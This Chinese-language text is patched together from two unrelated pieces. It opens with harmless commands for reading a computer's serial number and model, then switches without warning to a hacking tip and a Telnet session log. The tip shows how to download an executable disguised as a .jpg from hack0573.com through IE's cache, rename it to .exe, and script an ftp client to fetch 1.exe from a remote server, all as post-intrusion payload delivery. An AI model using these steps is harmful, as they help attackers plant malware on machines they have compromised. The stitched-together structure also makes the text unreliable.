Windows：
wmic bios get serialnumber

Mac OS X：
ioreg -l | grep IOPlatformSerialNumber

Linux：
sudo dmidecode -t system | grep Serial

此外，这条命令还可以查到电脑的型号：
wmic csproduct get name

或者你也可以这样来查询电脑型号以及序列号：
wmic csproduct get identifyingnumber,name

以上命令并不适用于所有的电脑，有时你也可见到这样的返回值：

SerialNumber
To Be Filled By O.E.M.

SerialNumber
0

这些都是因为制造商没有将信息录入正确造成的。

二、打个比方上传后的地址为：http://www.hack0573.com/hqw.jpg。我们就在CMD Shell下输入：
start its:http://www.hack0573.com/hqw.jpg。
这样会把hqw.jpg下载到IE的临时文件夹中。这些下载的临时文件的命名有一个特点，就是会保存成hqw[1].jpg。如果有其它同名的情况，还可能会保存为hqw[2].jpg一类的。如果是exe文件就会提示下载，这样没有达到我们的目的。

三、我们用dir /s hqw[1].jpg这个命令来搜索具体的目录。搜索出来的路径为：
C:\Documents and Settings\hqw20\Local Settings\Temporary Internet Files\Content
.IE5\89OVGV07

四、然后用退出到C盘根目录，用命令
copy “C:\Documents and Settings\hqw20\Local Settings\Temporary Internet Files\Content
.IE5\89OVGV07\hqw[1].jpg” hqw.exe
就可以将我hqw[1].jpg还原成hqw.exe，此时hqw.exe处于C盘根目录。

接下来要怎么做就看你自己发挥了。怎么样，很巧妙吧？！

*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
C:\>echo open 192.168.0.147 > ftp.txt

C:\>echo hqw>>ftp.txt

C:\>echo 123>>ftp.txt

C:\>echo binary >> ftp.txt

C:\>echo get 1.exe >> ftp.txt

C:\>echo bye >> ftp.txt

C:\>ftp -s:ftp.txt
ftp> open 192.168.0.147
Connected to 192.168.0.147.
220 你Y又来了!!!
User (192.168.0.147:(none)):
331 Password required for hqw

230 User successfully logged in.
ftp>
ftp> binary
200 Type set to I
ftp> get 1.exe
200 Port command successful.
150 Opening BINARY mode data connection for file transfer.
226 Transfer complete
ftp: 761344 bytes received in 0.17Seconds 4426.42Kbytes/sec.
ftp> bye
220 再来揍死你!!!